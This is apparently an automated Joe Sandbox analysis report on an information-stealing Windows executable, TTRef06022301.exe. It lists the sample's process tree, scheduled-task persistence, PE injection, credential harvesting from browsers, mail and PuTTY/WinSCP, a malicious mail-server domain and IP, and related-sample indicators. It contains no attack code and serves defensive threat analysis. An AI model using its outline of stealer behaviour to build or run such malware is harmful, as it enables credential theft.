TTRef06022301.exe 15 2 7->13         started        17 powershell.exe 19 7->17         started        19 powershell.exe 21 7->19         started        21 schtasks.exe 1 7->21         started        71 Injects a PE file into a foreign processes 11->71 23 iJyzakGsXF.exe 11->23         started        25 schtasks.exe 11->25         started        27 iJyzakGsXF.exe 11->27         started        signatures5 process6 dnsIp7 45 keefort.com.ec 88.99.90.21, 49716, 49721, 587 HETZNER-ASDE Germany 13->45 47 api4.ipify.org 104.237.62.211, 443, 49715 WEBNXUS United States 13->47 53 2 other IPs or domains 13->53 29 conhost.exe 17->29         started        31 conhost.exe 19->31         started        33 conhost.exe 21->33         started        49 173.231.16.76, 443, 49718 WEBNXUS United States 23->49 51 192.168.2.1 unknown unknown 23->51 55 2 other IPs or domains 23->55 75 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 23->75 77 Tries to steal Mail credentials (via file / registry access) 23->77 79 Tries to harvest and steal browser information (history, passwords, etc) 23->79 35 conhost.exe 25->35         started        signatures8 process9

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  TTRef06022301.exe66%VirustotalBrowse

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  20.2.iJyzakGsXF.exe.400000.0.unpack100%AviraHEUR/AGEN.1244301Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://keefort.com.ec0%Avira URL Cloudsafe
                  http://mail.keefort.com.ec0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  keefort.com.ec
                  		88.99.90.21
                  		truetrue
                    		unknown
                    api4.ipify.org
                    		104.237.62.211
                    		truefalse
                      		high
                      api.ipify.org
                      		unknown
                      		unknownfalse
                        		high
                        mail.keefort.com.ec
                        		unknown
                        		unknownfalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.comTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designersGTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designers/?TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/bTheTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://keefort.com.ecTTRef06022301.exe, 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, TTRef06022301.exe, 00000008.00000002.504076365.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fontbureau.com/designers?TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.tiro.comTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designersTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.goodfont.co.krTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.carterandcone.comlTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sajatypeworks.comTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.typography.netDTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cn/cTheTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://api.ipify.orgTTRef06022301.exe, 00000008.00000002.504076365.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F51000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://fontfabrik.comTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cnTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.jiyu-kobo.co.jp/TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.galapagosdesign.com/DPleaseTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers8TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fonts.comTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.sandoll.co.krTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.urwpp.deDPleaseTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.zhongyicts.com.cnTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTTRef06022301.exe, 00000000.00000002.273699340.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, TTRef06022301.exe, 00000000.00000002.273699340.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000007.00000002.319999505.0000000002551000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000007.00000002.319999505.0000000002743000.00000004.00000800.00020000.00000000.sdmp, TTRef06022301.exe, 00000008.00000002.504076365.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.sakkal.comTTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://mail.keefort.com.ecTTRef06022301.exe, 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, TTRef06022301.exe, 00000008.00000002.504076365.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    88.99.90.21
                                                    		keefort.com.ecGermany
                                                    		24940HETZNER-ASDEtrue
                                                    104.237.62.211
                                                    		api4.ipify.orgUnited States
                                                    		18450WEBNXUSfalse
                                                    173.231.16.76
                                                    		unknownUnited States
                                                    		18450WEBNXUSfalse

                                                    Private

                                                    IP
                                                    192.168.2.1

                                                    General Information

                                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                                    Analysis ID:803161
                                                    Start date and time:2023-02-09 19:39:13 +01:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 11m 8s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:23
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample file name:TTRef06022301.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@20/11@8/4
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:Failed
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 39
                                                    • Number of non-executed functions: 3
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    19:40:11API Interceptor8x Sleep call for process: TTRef06022301.exe modified
                                                    19:40:16Task SchedulerRun new task: iJyzakGsXF path: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                    19:40:16API Interceptor64x Sleep call for process: powershell.exe modified
                                                    19:40:35API Interceptor4x Sleep call for process: iJyzakGsXF.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    88.99.90.21TTreff2092023.exeGet hashmaliciousBrowse
                                                      DHL 1 x 20' LY 0736449574 Shipment 0106245448.exeGet hashmaliciousBrowse
                                                        CV.exeGet hashmaliciousBrowse
                                                          CV.exeGet hashmaliciousBrowse
                                                            TTRe01302023.exeGet hashmaliciousBrowse
                                                              ttref01312023.exeGet hashmaliciousBrowse
                                                                TTRef01269764.exeGet hashmaliciousBrowse
                                                                  333rrrr333333Done.vbsGet hashmaliciousBrowse
                                                                    rtf.exeGet hashmaliciousBrowse
                                                                      Orden de compra #PO06709.vbsGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.Trojan.Win32.Sonbokli.Acl.48.exeGet hashmaliciousBrowse
                                                                          2.exeGet hashmaliciousBrowse
                                                                            SecuriteInfo.com.generic.ml.21828.exeGet hashmaliciousBrowse
                                                                              Comprobante de Pago.docGet hashmaliciousBrowse
                                                                                Comprobante de Pago.docGet hashmaliciousBrowse
                                                                                  Comprobante de Pago.docGet hashmaliciousBrowse
                                                                                    Hesap Bildirimi.xlsGet hashmaliciousBrowse
                                                                                      Hesap Bildirimi.xlsGet hashmaliciousBrowse
                                                                                        Hesap Bildirimi.xlsGet hashmaliciousBrowse
                                                                                          Comprobante de Pago.docGet hashmaliciousBrowse
                                                                                            104.237.62.211Offer Inquiry.exeGet hashmaliciousBrowse
                                                                                              Invoice.exeGet hashmaliciousBrowse
                                                                                                TTreff2092023.exeGet hashmaliciousBrowse
                                                                                                  oferta urgente GARMON ENERGIAS, S.L. 02.09.2023.vbsGet hashmaliciousBrowse
                                                                                                    SUC9Vfrbc5.rtfGet hashmaliciousBrowse
                                                                                                      TT copy.exeGet hashmaliciousBrowse
                                                                                                        R18bNCrdBQbK14j.exeGet hashmaliciousBrowse
                                                                                                          Solicitud de oferta ElectroStocks Salamanca ESPA#U00d1A N#U00ba 2100176 02092023.vbsGet hashmaliciousBrowse
                                                                                                            SOA.exeGet hashmaliciousBrowse
                                                                                                              RFQ 213.docx.docGet hashmaliciousBrowse
                                                                                                                New Order.exeGet hashmaliciousBrowse
                                                                                                                  Order Inquiry Feb 2023.exeGet hashmaliciousBrowse
                                                                                                                    Order Inquiry Feb 2023.exeGet hashmaliciousBrowse
                                                                                                                      DHL ORIGINAL DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                                        justificante de transferencia.vbsGet hashmaliciousBrowse
                                                                                                                          REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                                                                                                            fedex invoice ISP4PgzBmVS7wvC.exeGet hashmaliciousBrowse
                                                                                                                              New Order.exeGet hashmaliciousBrowse
                                                                                                                                e-dekont-20230208-.exeGet hashmaliciousBrowse
                                                                                                                                  PAYMENT SLIP_002_JPEG.exeGet hashmaliciousBrowse

                                                                                                                                    Domains

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    api4.ipify.orgSC0923881DB001.exeGet hashmaliciousBrowse
                                                                                                                                    • 173.231.16.76
                                                                                                                                    invocie.exeGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    Offer Inquiry.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    Invoice.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    TTreff2092023.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    Offer inquiry.exeGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    Curriculum Helton Admir CV.exeGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    ca865bb9-e407-4bc5-9409-65b3b1d9d236.exeGet hashmaliciousBrowse
                                                                                                                                    • 173.231.16.76
                                                                                                                                    oferta urgente GARMON ENERGIAS, S.L. 02.09.2023.vbsGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    Rechnung_pdf.vbsGet hashmaliciousBrowse
                                                                                                                                    • 173.231.16.76
                                                                                                                                    qGo0EEaOai.exeGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    SUC9Vfrbc5.rtfGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    TT copy.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    R18bNCrdBQbK14j.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    Invoice.exeGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    Articoli richiesti.vbsGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    Shipping Document.exeGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    Solicitud de oferta ElectroStocks Salamanca ESPA#U00d1A N#U00ba 2100176 02092023.vbsGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    SOA.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    RFQ 213.docx.docGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    keefort.com.ec333rrrr333333Done.vbsGet hashmaliciousBrowse
                                                                                                                                    • 88.99.90.21
                                                                                                                                    rtf.exeGet hashmaliciousBrowse
                                                                                                                                    • 88.99.90.21

                                                                                                                                    ASNs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    WEBNXUSSC0923881DB001.exeGet hashmaliciousBrowse
                                                                                                                                    • 173.231.16.76
                                                                                                                                    invocie.exeGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    Offer Inquiry.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    Invoice.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    TTreff2092023.exeGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    Offer inquiry.exeGet hashmaliciousBrowse
                                                                                                                                    • 173.231.16.76
                                                                                                                                    Curriculum Helton Admir CV.exeGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    ca865bb9-e407-4bc5-9409-65b3b1d9d236.exeGet hashmaliciousBrowse
                                                                                                                                    • 173.231.16.76
                                                                                                                                    oferta urgente GARMON ENERGIAS, S.L. 02.09.2023.vbsGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    Rechnung_pdf.vbsGet hashmaliciousBrowse
                                                                                                                                    • 173.231.16.76
                                                                                                                                    qGo0EEaOai.exeGet hashmaliciousBrowse
                                                                                                                                    • 173.231.16.76
                                                                                                                                    SUC9Vfrbc5.rtfGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    TT copy.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    R18bNCrdBQbK14j.exeGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    Invoice.exeGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    Articoli richiesti.vbsGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    Shipping Document.exeGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    Solicitud de oferta ElectroStocks Salamanca ESPA#U00d1A N#U00ba 2100176 02092023.vbsGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    SOA.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    RFQ 213.docx.docGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    HETZNER-ASDETTreff2092023.exeGet hashmaliciousBrowse
                                                                                                                                    • 88.99.90.21
                                                                                                                                    SecureMessageAtt.htmlGet hashmaliciousBrowse
                                                                                                                                    • 95.217.36.56
                                                                                                                                    SoLOfA6ezK.exeGet hashmaliciousBrowse
                                                                                                                                    • 116.203.231.217
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 148.251.234.93
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 148.251.234.93
                                                                                                                                    Shipping Document.exeGet hashmaliciousBrowse
                                                                                                                                    • 46.4.214.202
                                                                                                                                    SecureMessageAtt.htmlGet hashmaliciousBrowse
                                                                                                                                    • 95.217.36.56
                                                                                                                                    cnf13429226.vbsGet hashmaliciousBrowse
                                                                                                                                    • 94.130.164.100
                                                                                                                                    https://validacija-lozinke-administratora-servera-eu-68x.s3.us-west-004.backblazeb2.com/index.html#enela@tzs.baGet hashmaliciousBrowse
                                                                                                                                    • 46.4.252.224
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 148.251.234.93
                                                                                                                                    Order Inquiry Feb 2023.exeGet hashmaliciousBrowse
                                                                                                                                    • 46.4.214.202
                                                                                                                                    Order Inquiry Feb 2023.exeGet hashmaliciousBrowse
                                                                                                                                    • 46.4.214.202
                                                                                                                                    DHL ORIGINAL DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                                                    • 144.76.136.153
                                                                                                                                    DHL Original Documents.exeGet hashmaliciousBrowse
                                                                                                                                    • 144.76.136.153
                                                                                                                                    prog.apkGet hashmaliciousBrowse
                                                                                                                                    • 144.76.58.8
                                                                                                                                    Payment Advice Note from 09.02.2023#U25b6#Ufe0f#U25b6#Ufe0f.htmGet hashmaliciousBrowse
                                                                                                                                    • 78.46.190.171
                                                                                                                                    TBRpAD2HYJ.exeGet hashmaliciousBrowse
                                                                                                                                    • 95.217.14.200
                                                                                                                                    Wv5Lg653LX.elfGet hashmaliciousBrowse
                                                                                                                                    • 49.13.202.235
                                                                                                                                    i1lq1Qpbyw.exeGet hashmaliciousBrowse
                                                                                                                                    • 116.203.195.42
                                                                                                                                    Contract_2210-Feb-06-23.oneGet hashmaliciousBrowse
                                                                                                                                    • 144.76.136.153

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    SC0923881DB001.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    tPXWmHdD0L.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    invocie.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    Jubilee Association of Maryland Doc.htmlGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    pixel.dllGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    pixel.dllGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    Offer Inquiry.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    Invoice.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    TTreff2092023.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    Offer inquiry.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    TR7635 NX202302.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    Curriculum Helton Admir CV.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    Order Ref PO-NZL_25100137.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    ca865bb9-e407-4bc5-9409-65b3b1d9d236.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    oferta urgente GARMON ENERGIAS, S.L. 02.09.2023.vbsGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    Rechnung_pdf.vbsGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    PO-MW-17-02-002S.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    qGo0EEaOai.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    TT copy.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76

                                                                                                                                    Dropped Files

                                                                                                                                    No context

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TTRef06022301.exe.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):1302
                                                                                                                                    Entropy (8bit):5.3499841584777394
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84bE4Ks:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                                                    MD5:4664C2114894A4BFC1E657FC08C72FF4
                                                                                                                                    SHA1:95A1E14E2AD65BCA561261DA3899074BF5276AED
                                                                                                                                    SHA-256:6E36229D13672B4304C696812B365F2E5657875DD0E11F13AE010566CC87607A
                                                                                                                                    SHA-512:4E7862716D5C0BC2174E819BAB329A2974FE83A36D5417EE732AB2F3D77D95620B3D462A1C9608F5FE90A48030140DE53DB642F8C370CD8E191BDBE83C638CA1
                                                                                                                                    Malicious:true
                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\iJyzakGsXF.exe.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1216
                                                                                                                                    Entropy (8bit):5.355304211458859
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                                                    MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                                                    SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                                                    SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                                                    SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                                                    Malicious:false
